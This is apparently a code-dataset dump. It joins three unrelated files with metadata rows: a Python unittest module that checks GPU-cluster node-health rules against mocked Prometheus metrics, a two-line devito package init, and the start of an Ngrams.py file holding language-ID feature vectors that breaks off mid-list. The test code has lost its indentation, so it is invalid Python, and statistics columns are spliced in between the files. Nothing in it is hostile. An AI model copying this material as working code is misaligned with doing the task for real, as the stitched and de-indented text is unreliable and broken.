def create_rule(self):
self.rule = Rule("dummy_metric")
def setUp(self):
self.create_rule()
self.rule.prometheus_util = MockPrometheusUtil()
self.job = Job("job1", "user1", "vc1")
self.node = Node("node1",
"192.168.0.1",
True,
False,
"Standard_ND24rs",
4,
4,
4,
State.IN_SERVICE,
infiniband=["mlx4_0:1", "mlx4_1:1"],
ipoib=["ib0", "ib1"],
nv_peer_mem=1,
nvsm=True)
self.node.jobs = {"job1": self.job}
def update_data_and_validate(self, query_data):
for q_data in query_data:
self.rule.prometheus_util.data.append(q_data)
self.rule.update_data()
i = 0
for metric in self.rule.metrics:
self.assertEqual(query_data[i]["data"]["result"],
self.rule.data["current"][metric])
i += 1
self.assertEqual(query_data[i]["data"]["result"],
self.rule.data[self.rule.stat][metric])
i += 1
def test_check_health(self):
pass
def test_prepare(self):
# When there is a job on the node
self.node.jobs = [self.job]
if self.rule.wait_for_jobs:
self.assertFalse(self.rule.prepare(self.node))
# When there is no job on the node
self.node.jobs = []
self.assertTrue(self.rule.prepare(self.node))
class TestUnschedulableRule(TestRule):
def create_rule(self):
self.rule = UnschedulableRule()
def test_check_health(self):
# Node is marked as unschedulable but not in repair cycle.
# Wait for admin to do manual repair
self.node.unschedulable = True
self.node.repair_cycle = False
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
# Node is marked as unschedulable and in repair cycle.
self.node.repair_cycle = True
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# Node is schedulable
self.node.unschedulable = False
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestK8sGpuRule(TestRule):
def create_rule(self):
self.rule = K8sGpuRule()
def test_check_health(self):
# expected > total && total > allocatable
self.node.gpu_total = 3
self.node.gpu_allocatable = 2
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# expected > total && total == allocatable
self.node.gpu_total = 3
self.node.gpu_allocatable = 3
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# expected == total && total > allocatable
self.node.gpu_total = 4
self.node.gpu_allocatable = 3
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# expected == total == allocatable
self.node.gpu_total = 4
self.node.gpu_allocatable = 4
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestDcgmEccDBERule(TestRule):
def create_rule(self):
self.rule = DcgmEccDBERule()
def test_check_health(self):
        # Node has an ECC DBE on a GPU
dcgm_ecc_dbe_volatile_total = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '0', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-56d27439-dfc9-19d4-687b-ad6f2fdf0e9f'}, 'value': [1591920200.233, '0']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '1', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-776cf9b1-fc9c-34c2-573b-33cac6cb496f'}, 'value': [1591920200.233, '2']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '2', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-333595ba-3900-436e-9632-2e8d7b1577a3'}, 'value': [1591920200.233, '0']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '3', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-cb1843c2-a39f-6b8a-a613-85fe145b405c'}, 'value': [1591920200.233, '0']}]}}
self.update_data_and_validate(
[dcgm_ecc_dbe_volatile_total, dcgm_ecc_dbe_volatile_total])
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
        # Node has no ECC DBEs on any GPU
dcgm_ecc_dbe_volatile_total = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '0', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-56d27439-dfc9-19d4-687b-ad6f2fdf0e9f'}, 'value': [1591920200.233, '0']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '1', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-776cf9b1-fc9c-34c2-573b-33cac6cb496f'}, 'value': [1591920200.233, '0']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '2', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-333595ba-3900-436e-9632-2e8d7b1577a3'}, 'value': [1591920200.233, '0']}, {'metric': {'__name__': 'dcgm_ecc_dbe_volatile_total', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'minor_number': '3', 'scraped_from': 'job-exporter-zslkh', 'uuid': 'GPU-cb1843c2-a39f-6b8a-a613-85fe145b405c'}, 'value': [1591920200.233, '0']}]}}
self.update_data_and_validate(
[dcgm_ecc_dbe_volatile_total, dcgm_ecc_dbe_volatile_total])
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestInfinibandRule(TestRule):
def create_rule(self):
self.rule = InfinibandRule()
def test_check_health(self):
        # An InfiniBand device is down
infiniband_up = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'infiniband_up', 'device': 'mlx4_0', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'link_layer': 'InfiniBand', 'phys_state': 'LinkUp', 'port': '1', 'rate': '40 Gb/sec (4X QDR)', 'scraped_from': 'job-exporter-zslkh', 'state': 'ACTIVE'}, 'value': [1592254588.528, '1']}, {'metric': {'__name__': 'infiniband_up', 'device': 'mlx4_1', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'link_layer': 'InfiniBand', 'phys_state': 'LinkUp', 'port': '1', 'rate': '40 Gb/sec (4X QDR)', 'scraped_from': 'job-exporter-zslkh', 'state': 'ACTIVE'}, 'value': [1592254588.528, '0']}]}}
self.update_data_and_validate([infiniband_up, infiniband_up])
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
        # All InfiniBand devices are up
infiniband_up = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'infiniband_up', 'device': 'mlx4_0', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'link_layer': 'InfiniBand', 'phys_state': 'LinkUp', 'port': '1', 'rate': '40 Gb/sec (4X QDR)', 'scraped_from': 'job-exporter-zslkh', 'state': 'ACTIVE'}, 'value': [1592254588.528, '1']}, {'metric': {'__name__': 'infiniband_up', 'device': 'mlx4_1', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'link_layer': 'InfiniBand', 'phys_state': 'LinkUp', 'port': '1', 'rate': '40 Gb/sec (4X QDR)', 'scraped_from': 'job-exporter-zslkh', 'state': 'ACTIVE'}, 'value': [1592254588.528, '1']}]}}
self.update_data_and_validate([infiniband_up, infiniband_up])
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestIPoIBRule(TestRule):
def create_rule(self):
self.rule = IPoIBRule()
def test_check_health(self):
        # An IPoIB interface is down
ipoib_up = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'ipoib_up', 'device': 'ib0', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh', 'state': 'UP'}, 'value': [1592255865.342, '1']}, {'metric': {'__name__': 'ipoib_up', 'device': 'ib1', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh', 'state': 'DOWN'}, 'value': [1592255865.342, '0']}]}}
self.update_data_and_validate([ipoib_up, ipoib_up])
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# All IPoIB interfaces are up
ipoib_up = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'ipoib_up', 'device': 'ib0', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh', 'state': 'UP'}, 'value': [1592255865.342, '1']}, {'metric': {'__name__': 'ipoib_up', 'device': 'ib1', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh', 'state': 'UP'}, 'value': [1592255865.342, '1']}]}}
self.update_data_and_validate([ipoib_up, ipoib_up])
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestNvPeerMemRule(TestRule):
def create_rule(self):
self.rule = NvPeerMemRule()
def test_check_health(self):
# nv_peer_mem is down
nv_peer_mem_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nv_peer_mem_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592256663.895, '0']}]}}
self.update_data_and_validate([nv_peer_mem_count, nv_peer_mem_count])
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# nv_peer_mem is up
nv_peer_mem_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nv_peer_mem_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592256663.895, '1']}]}}
self.update_data_and_validate([nv_peer_mem_count, nv_peer_mem_count])
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
class TestNVSMRule(TestRule):
def create_rule(self):
self.rule = NVSMRule()
def test_check_health(self):
# There is some failure in nvsm health check
nvsm_health_total_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nvsm_health_total_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592257205.813, '169']}]}}
nvsm_health_good_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nvsm_health_good_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592257205.813, '168']}]}}
self.update_data_and_validate([
nvsm_health_total_count, nvsm_health_total_count,
nvsm_health_good_count, nvsm_health_good_count
])
self.assertFalse(self.rule.check_health(self.node))
self.assertFalse(self.rule.check_health(self.node, stat="current"))
# All checks are good
nvsm_health_total_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nvsm_health_total_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592257205.813, '169']}]}}
nvsm_health_good_count = {'status': 'success', 'data': {'resultType': 'vector', 'result': [{'metric': {'__name__': 'nvsm_health_good_count', 'exporter_name': 'job-exporter', 'instance': '192.168.0.1:9102', 'job': 'serivce_exporter', 'scraped_from': 'job-exporter-zslkh'}, 'value': [1592257205.813, '169']}]}}
self.update_data_and_validate([
nvsm_health_total_count, nvsm_health_total_count,
nvsm_health_good_count, nvsm_health_good_count
])
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
        # Node is in the exception list
self.node.nvsm = None
self.assertTrue(self.rule.check_health(self.node))
self.assertTrue(self.rule.check_health(self.node, stat="current"))
if __name__ == '__main__':
unittest.main()
| 58 | 1,273 | 0.648027 | 1,909 | 15,254 | 4.932425 | 0.112101 | 0.048428 | 0.070093 | 0.076678 | 0.818288 | 0.799384 | 0.785684 | 0.761151 | 0.755204 | 0.755204 | 0 | 0.065309 | 0.175888 | 15,254 | 262 | 1,274 | 58.221374 | 0.683716 | 0.047266 | 0 | 0.491329 | 0 | 0 | 0.317781 | 0.043143 | 0 | 0 | 0 | 0 | 0.236994 | 1 | 0.127168 | false | 0.00578 | 0.034682 | 0 | 0.231214 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
75d6e13473b7847048fa01e7f51ddcdcc3e0e36b | 101 | py | Python | devito/ir/clusters/__init__.py | BrunoMot/devito | b6e077857765b7b5fad812ec5774635ca4c6fbb7 | [
"MIT"
] | 1 | 2020-01-30T17:49:12.000Z | 2020-01-30T17:49:12.000Z | devito/ir/clusters/__init__.py | BrunoMot/devito | b6e077857765b7b5fad812ec5774635ca4c6fbb7 | [
"MIT"
] | 1 | 2019-11-06T18:01:25.000Z | 2019-11-06T18:01:25.000Z | devito/ir/clusters/__init__.py | BrunoMot/devito | b6e077857765b7b5fad812ec5774635ca4c6fbb7 | [
"MIT"
] | 2 | 2018-11-15T12:03:48.000Z | 2018-11-15T13:16:19.000Z | from devito.ir.clusters.cluster import * # noqa
from devito.ir.clusters.algorithms import * # noqa
| 33.666667 | 51 | 0.762376 | 14 | 101 | 5.5 | 0.571429 | 0.25974 | 0.311688 | 0.519481 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138614 | 101 | 2 | 52 | 50.5 | 0.885057 | 0.089109 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
75e0340b52036e9dbd2bfd415779234db463fed2 | 14,345 | py | Python | Ngrams.py | abigailyuan/LIDproj | 3e34c4d78b89c9513182ab064dc4b3858f59a1d2 | [
"MIT"
] | null | null | null | Ngrams.py | abigailyuan/LIDproj | 3e34c4d78b89c9513182ab064dc4b3858f59a1d2 | [
"MIT"
] | null | null | null | Ngrams.py | abigailyuan/LIDproj | 3e34c4d78b89c9513182ab064dc4b3858f59a1d2 | [
"MIT"
] | null | null | null | import math
import re
import string
from collections import defaultdict as dd
train_data = [[0.0, 0.48460213156441156, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.44129227922652936, 0.0, 0.0, 0.3242386242592802, 0.0, 0.0, 0.0, 0.4483154985245643, 0.08779024122543687, 0.0, 0.0, 0.0, 0.0, 0.0, 0.071402729530022, 0.05033307163591714, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.13344116666266403, 0.0, 0.002341073099344983, 0.2235724809874459, 0.0, 0.0, 0.0842786315764194, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.019899121344432356, 0.0, 0.0, 0.0, 0.004682146198689966, 0.0, 0.0, 0.416711011683407, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'de'], [0.0, 0.011517021809825537, 0.0, 0.006581155319900307, 0.0, 0.0, 0.0, 0.0, 0.008226444149875382, 0.0, 0.0, 0.013162310639800614, 0.5396547362318251, 0.0, 0.0, 0.011517021809825537, 0.0, 0.0, 0.3027331447154141, 0.0, 0.0, 0.0, 0.006581155319900307, 0.0032905776599501534, 0.0, 0.0, 0.20895168140683473, 0.0, 0.0, 0.0, 0.0, 0.018098177129725845, 0.0, 0.0, 0.00493586648992523, 0.0, 0.0, 0.0032905776599501534, 0.45903558356304636, 0.3981598968539685, 0.0, 0.0, 0.0, 0.07568328617885353, 0.013162310639800614, 0.0, 0.0, 0.0, 0.0016452888299750767, 0.0, 0.0, 0.0032905776599501534, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4442279840932707, 'fa'], [0.0, 0.29991858801208704, 0.0, 0.003107964642612301, 0.0, 0.0, 0.0, 0.0, 0.4187982355920076, 0.0, 0.0, 0.28049380899576015, 0.0, 0.0, 0.0, 0.4871734577294782, 0.027194690622857634, 0.0, 0.0, 0.0, 0.0, 0.0, 0.26573097694335174, 0.06060531053093987, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.32711327863494466, 0.0, 0.011654867409796129, 0.464640714070539, 0.0, 0.0, 0.07459115142269522, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09323893927836903, 0.0, 0.0, 0.0, 0.006215929285224602, 0.0, 0.0, 0.07925309838661368, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'en'], [0.0, 0.012838462075170039, 0.0, 0.15406154490204046, 0.15406154490204046, 0.0, 0.0, 0.0, 0.012838462075170039, 0.0, 0.0, 0.012838462075170039, 0.0, 0.0, 0.0, 0.025676924150340077, 0.0, 0.0, 0.0, 0.0, 0.0, 0.10270769660136031, 0.0, 0.0, 0.0, 0.0, 0.0, 0.680438489984012, 0.0, 0.42366924848061127, 
0.0, 0.0, 0.0, 0.07703077245102023, 0.012838462075170039, 0.0, 0.25676924150340075, 0.025676924150340077, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4750230967812914, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'ja'], [0.0, 0.009648771597265387, 0.0, 0.009648771597265387, 0.0, 0.0, 0.0, 0.0, 0.01447315739589808, 0.0, 0.0, 0.01447315739589808, 0.0, 0.0, 0.0, 0.036986957789517313, 0.0, 0.4374109790760309, 0.0, 0.0, 0.0, 0.0, 0.022513800393619235, 0.0016081285995442312, 0.3988158926869693, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.019297543194530774, 0.4953036086596232, 0.0016081285995442312, 0.02733818619225193, 0.0, 0.0, 0.011256900196809617, 0.0, 0.0, 0.0, 0.4920873514605347, 0.0, 0.0, 0.0016081285995442312, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0032162571990884624, 0.19136730334576352, 0.0, 0.3489639061010982, 0.0, 0.0, 0.0, 'bg'], [0.0, 0.0038862654955984, 0.0, 0.005829398243397599, 0.0, 0.0, 0.0, 0.0, 0.013601929234594398, 0.0, 0.0, 0.005829398243397599, 0.0, 0.0, 0.0, 0.027203858469188796, 0.0, 0.39445594780323756, 0.0, 0.0, 0.0, 0.0, 0.013601929234594398, 0.0019431327477992, 0.2254033987447072, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0077725309911968, 0.47023812496740636, 0.0019431327477992, 0.009715663738996, 0.0, 0.0, 0.0019431327477992, 0.0, 0.0, 0.0, 0.5110439126711895, 0.0, 0.0, 0.0155450619823936, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.39834221329883596, 0.0, 0.38862654955984, 0.0, 0.0, 0.0, 'ru'], [0.0, 0.00571968110120663, 0.0, 0.002859840550603315, 0.0, 0.0, 0.0, 0.0, 0.01715904330361989, 0.0, 0.0, 0.0, 0.49475241525437347, 0.0, 0.0, 0.008579521651809944, 0.0, 0.0, 0.19446915744102541, 0.0, 0.0, 0.0, 0.008579521651809944, 0.002859840550603315, 0.0, 0.0, 0.4032375176350674, 0.0, 0.0, 0.0, 0.0, 0.008579521651809944, 0.0, 0.0, 0.002859840550603315, 0.0, 0.0, 0.00571968110120663, 0.0, 0.3746391121290342, 0.0, 0.0, 0.0, 0.44613512589411713, 0.10295425982171934, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.00571968110120663, 0.0, 0.0, 0.0, 0.0, 0.0, 0.45185480699532377, 'ar'], [0.0, 
0.29491658568464524, 0.0, 0.006325288701011157, 0.0, 0.0, 0.0, 0.0, 0.30519517982378835, 0.0, 0.0, 0.23166369867453365, 0.0, 0.0, 0.0, 0.4158877320914836, 0.1193898242315856, 0.007906610876263946, 0.0, 0.0, 0.0, 0.0, 0.5265802843591789, 0.3763546777101639, 0.004743966525758368, 0.0, 0.0, 0.0, 0.0015813221752527893, 0.0, 0.0, 0.07195015897400192, 0.008697271963890342, 0.018185205015407078, 0.23403568193741284, 0.0, 0.0, 0.23640766520029202, 0.0, 0.0, 0.0, 0.011069255226769525, 0.0, 0.0, 0.16762015057679566, 0.0, 0.0, 0.0, 0.031626443505055786, 0.0, 0.0, 0.120180485319212, 0.0007906610876263946, 0.0, 0.0055346276133847625, 0.0, 0.0, 0.0, 'unk'], [0.5894794740481756, 0.019390772172637353, 0.003878154434527471, 0.06205047095243953, 0.0, 0.0, 0.0, 0.2559581926788131, 0.027147081041692295, 0.027147081041692295, 0.0, 0.011634463303582412, 0.0, 0.0, 0.0, 0.05429416208338459, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06980677982149447, 0.019390772172637353, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.023268926607164824, 0.0, 0.0, 0.06980677982149447, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5545760841374283, 0.0, 0.0, 0.0, 0.0, 0.0, 0.003878154434527471, 0.08531939755960435, 0.2947397370240878, 0.0, 0.0, 0.40720621562538445, 0.0, 0.0, 0.0, 0.0, 'mr'], [0.0, 0.26685250860506066, 0.0, 0.004252629619204154, 0.0, 0.0, 0.0, 0.0, 0.37529456389476656, 0.0, 0.0, 0.2944946011298877, 0.0, 0.0, 0.0, 0.5156313413285036, 0.4018734990147925, 0.0, 0.0, 0.0, 0.0, 0.0, 0.11801047193291526, 0.13183151819532876, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.07867364795527684, 0.0, 0.006378944428806231, 0.45290505444524237, 0.0, 0.0, 0.043589453596842576, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.038273666572837386, 0.0, 0.0, 0.0, 0.017010518476816616, 0.0, 0.0, 0.165852555148962, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'fr'], [0.0, 0.4177737641253415, 0.0, 0.0010879525107430768, 0.0, 0.0, 0.0, 0.0, 0.38187133127082, 0.0, 0.0, 0.39275085637825075, 0.0, 0.0, 0.0, 0.36555204360967386, 0.26981222266428306, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.09030005839167538, 0.038078337876007694, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.21432664461638615, 0.0, 0.0021759050214861537, 0.2219423121915877, 0.0, 0.0, 0.05222172051566769, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.05113376800492461, 0.0, 0.0, 0.0, 0.004351810042972307, 0.0, 0.0, 0.4569400545120923, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'nl'], [0.0, 0.06766917293233082, 0.0, 0.007518796992481203, 0.0, 0.37969924812030076, 0.0, 0.0, 0.041353383458646614, 0.0, 0.0, 0.03383458646616541, 0.007518796992481203, 0.0, 0.0, 0.08270676691729323, 0.0, 0.0, 0.11654135338345864, 0.40601503759398494, 0.0, 0.0, 0.022556390977443608, 0.015037593984962405, 0.0, 0.0, 0.3082706766917293, 0.0, 0.0, 0.0, 0.40977443609022557, 0.018796992481203006, 0.0, 0.0, 0.06766917293233082, 0.0, 0.0, 0.0037593984962406013, 0.5075187969924813, 0.16541353383458646, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3308270676691729, 'ur'], [0.0, 0.03681913914463891, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06883578187910754, 0.0, 0.0, 0.09604992820340585, 0.0, 0.0, 0.0, 0.5250729408452853, 0.03201664273446862, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4994596266577105, 0.360187230762772, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0208108177774046, 0.0, 0.0, 0.056029124785320086, 0.0, 0.0, 0.5218712765718385, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0208108177774046, 0.0, 0.0, 0.0, 0.22891899555145062, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'it'], [0.0, 0.2188964504201349, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.023416829579828383, 0.0, 0.0, 0.22805955764702426, 0.0, 0.0, 0.0, 0.2555488793276924, 0.36754241210078464, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5324783421847933, 0.03868867495797733, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.060069258487385854, 0.0, 0.0020362460504198595, 0.40928545613439177, 0.0, 0.0, 0.42659354756296053, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.057014889411756066, 0.0, 0.0, 0.0, 0.0030543690756297892, 0.0, 0.0, 0.24027703394954342, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 'es'], [0.0, 0.0, 0.0, 0.02676438637860946, 0.0, 0.0, 
0.0, 0.0, 0.02676438637860946, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02676438637860946, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02676438637860946, 0.0, 0.0, 0.3747014093005324, 0.0, 0.0, 0.0, 0.0, 0.0, 0.02676438637860946, 0.0, 0.02676438637860946, 0.02676438637860946, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.642345273086627, 0.0, 0.3747014093005324, 0.3747014093005324, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4014657956791419, 0.0, 'ko'], [0.4940079820559727, 0.009106137918082445, 0.3961169994365864, 0.0, 0.0, 0.0, 0.0, 0.18667582732069013, 0.013659206877123669, 0.004553068959041223, 0.0, 0.011382672397603058, 0.0, 0.0, 0.0, 0.01593574135664428, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01593574135664428, 0.011382672397603058, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.009106137918082445, 0.0, 0.0022765344795206113, 0.013659206877123669, 0.0, 0.0, 0.01593574135664428, 0.0, 0.0, 0.0, 0.0, 0.327820965050968, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5031141199740551, 0.30505562025576194, 0.0, 0.0, 0.33009749953048867, 0.0, 0.0, 0.0, 0.0, 'ne'], [0.5406059970783489, 0.02621119985834419, 0.24245359868968375, 0.019658399893758144, 0.0, 0.0, 0.0, 0.2227951987959256, 0.07863359957503258, 0.3341927981938884, 0.0, 0.02621119985834419, 0.0, 0.0, 0.0, 0.022934799876051164, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.019658399893758144, 0.029487599840637212, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.029487599840637212, 0.0, 0.0, 0.09173919950420466, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.4292083976803861, 0.0, 0.0, 0.0, 0.0, 0.0, 0.013105599929172094, 0.07208079961044653, 0.33746919817618143, 0.009829199946879072, 0.0, 0.4062735978043349, 0.0, 0.0, 0.0, 0.0, 'hi'], [0.0, 0.058722021951470346, 0.0, 0.0, 0.0, 0.0, 0.4404151646360276, 0.0, 0.08808303292720551, 0.0, 0.5284981975632331, 0.029361010975735173, 0.0, 0.0, 0.0, 0.029361010975735173, 0.0, 0.0, 0.0, 0.0, 0.38169314268455723, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.029361010975735173, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
